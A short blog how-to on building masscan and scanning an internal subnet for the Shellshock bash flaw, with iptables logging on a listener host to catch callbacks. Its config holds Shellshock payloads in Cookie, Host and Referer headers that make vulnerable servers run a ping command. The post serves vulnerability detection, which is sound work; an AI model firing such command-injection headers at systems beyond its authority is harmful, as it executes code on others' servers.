How to scan for shellshock


cd /root
sudo apt-get install git gcc make libpcap-dev
git clone https://github.com/robertdavidgraham/masscan
cd masscan
make

then copied this into a file shellshock.conf


range = 172.16.1.1-172.16.1.254
port = 80
banners = true
http-user-agent = shellshock-scan
http-header = Cookie:() { :; }; ping -c 3 172.16.1.217
http-header = Host:() { :; }; ping -c 3 172.16.1.217
http-header = Referer:() { :; }; ping -c 3 172.16.1.217

Then I ssh’ed to 172.16.1.217 and added this to my /etc/iptables.rules file


-N LOGGING
-A LOGGING -m limit --limit 200/min -j LOG --log-prefix "SHELLSHOCK: " --log-level 7
-A LOGGING -j RETURN
-A INPUT -s 172.16.1.0/24 -p icmp --icmp-type echo-request -j LOGGING

I tested by pinging it, and it logged.

then ran /root/masscan/bin/masscan -c shellshock.conf

This entry was posted in Linux. Bookmark the permalink.

Comments are closed.